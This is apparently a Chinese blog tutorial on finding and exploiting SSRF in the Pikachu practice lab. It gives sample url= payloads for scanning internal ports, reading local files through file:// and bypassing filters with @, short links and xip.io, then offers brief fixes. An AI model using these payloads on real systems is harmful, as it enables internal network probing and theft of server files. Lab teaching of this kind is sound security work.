Web安全 SSRF漏洞的 测试和利用.(读取服务器的任何文件)
2023-09-27 14:29:29 时间
SSRF漏洞的概括
SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个漏洞。(例如:攻击者操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务端的请求伪造)SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器.
目录:
第二步:使用SSRF漏洞,对服务器端口进行扫描(也可以利用burp 来进行爆破)
攻击的目标:从外网无法访问内部系统.
形成的原因:由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过虑与限制.
靶场:
本地自己搭建的 Pikachu(皮卡丘)靶场:安装在win 2003(IP地址:192.168.0.102)
Pikachu(皮卡丘)靶场搭建链接:Web安全 Pikachu(皮卡丘)靶场搭建._半个西瓜.的博客-CSDN博客
SSRF漏洞的利用步骤:
第一步:确定网站存在 SSRF 漏洞.
第二步:使用SSRF漏洞,对服务器端口进行扫描(也可以利用burp 来进行爆破)
url=http://127.0.0.1:3306
url=dict://127.0.0.1:3306/info
url=ftp://127.0.0.1:21
第三步:使用 SSRF 漏洞,对服务器的文件进行读取.
url=file:///c://phpStudy/WWW/phpMyAdmin/webapp.php
关于SSRF基础的绕过:
(1)攻击本地
http://127.0.0.1:80
http://localhost:22
(2)利用 @
http://example.com@127.0.0.1
(3)利用 短地址.
http://dwz.cn/11SMa >> http://127.0.0.1
(4)利用 特殊域名.
http://127.0.0.1.xip.io/ #利用的原理是DNS解析
SSRF漏洞修复建议:
(1)限制请求的端口只能为 Web 端口,只允许访问 HTTP 和 HTTPS 的请求.
(2)黑名单内网 IP,避免应用被用来获取获取内网数据,攻击内网.
(3)屏蔽返回的详细信息.
相关文章
- TK 教主:Android 成为漏洞王?真实漏洞排名可能另有玄机
- Python新型字符串格式漏洞分析
- 7月31日科技资讯|华为否认鸿蒙为噱头;谷歌公布 6 大 iOS 漏洞;GitLab 又发安全补丁
- Adobe修复Flash播放器35个漏洞
- OpenSSL再爆“水牢”漏洞,多家银行和互联网公司受影响
- Linux内核又爆远程DoS漏洞CVE-2017-7645 没有看到不受影响的版本
- NTFS 3.1出现DoS漏洞 影响WinXP到Win8.1所有版本 据称10行代码就可以DoS攻击
- CVE-2016-10190 FFmpeg Http协议 heap buffer overflow漏洞分析及利用
- 文档型漏洞攻击研究报告
- D-Link路由器现DNS劫持漏洞 其他设备或受影响
- 黑客利用理财APP漏洞 半天内提现一千多万元
- 如何使用 Grype 查找容器和文件中的漏洞
- 89.网络安全渗透测试—[常规漏洞挖掘与利用篇5]—[文件包含漏洞详解&实战示例]
- 58.网络安全渗透测试—[文件上传篇8] —[. htaccess重写解析漏洞-突破上传]
- 51.网络安全渗透测试—[文件上传篇1]—[文件上传过程详解/造成漏洞原因/文件上传绕过姿势]
- 1.File Upload文件上传漏洞——小白笔记——DVWA
- MSA互联网管理网关任意文件读取漏洞
- 文件包含漏洞详解
- CTF-WEB:经典文件上传漏洞
- Web安全 文件上传漏洞的 测试和利用.(上传一个图片或文件 拿下服务器最高权限.)
- 文件上传之iis编辑器漏洞
- 文件上传之IIS—put漏洞
- [ 漏洞复现篇 ] Apache Spark 命令注入(CVE-2022-33891)
- [ 漏洞复现篇 ]通达 OA11.6 文件删除 + 任意文件上传 rce 漏洞复现
- Apache Tomcat Session 反序列化代码执行漏洞(CVE-2021-2532)